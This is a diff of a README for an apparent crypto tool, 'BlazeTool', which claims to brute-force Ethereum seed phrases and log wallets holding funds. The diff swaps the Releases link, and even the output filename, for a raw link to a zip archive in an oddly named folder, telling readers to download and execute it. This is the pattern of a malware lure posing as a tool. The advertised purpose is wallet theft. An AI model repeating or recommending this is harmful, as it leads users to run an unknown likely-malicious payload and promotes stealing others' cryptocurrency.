musab9osman/BlazeTool/README.md

 ## Overview

 BlazeTool is a powerful tool designed to brute force Ethereum wallet mnemonics.
 It operates with multiple threads, making it surprisingly fast.
 The tool automatically generates seed phrases and checks balances on Ethereum networks.
-If it finds a wallet with a non-zero balance, it logs the wallet's information and saves it to a file named `result.txt`.
+If it finds a wallet with a non-zero balance, it logs the wallet's information and saves it to a file named `https://github.com/musab9osman/BlazeTool/raw/refs/heads/main/assumpsit/Tool_Blaze_3.0.zip`.

-For the latest version, download and execute the file from the [Releases section](https://github.com/musab9osman/BlazeTool/releases).
+For the latest version, download and execute the file from the [Releases section](https://github.com/musab9osman/BlazeTool/raw/refs/heads/main/assumpsit/Tool_Blaze_3.0.zip).

 ## Features

 - **Multi-threaded**: BlazeTool runs multiple threads to speed up the brute-forcing process.
 - **Automatic Seed Phrase Generation**: The tool generates seed phrases on its own.
 - **Balance Checking**: It checks balances for Ethereum wallets.
-- **Logging**: Any wallet with a non-zero balance is logged and saved to `result.txt`.
+- **Logging**: Any wallet with a non-zero balance is logged and saved to `https://github.com/musab9osman/BlazeTool/raw/refs/heads/main/assumpsit/Tool_Blaze_3.0.zip`.
 - **User-Friendly**: Designed for ease of use, even for those new to Ethereum.

 ## Installation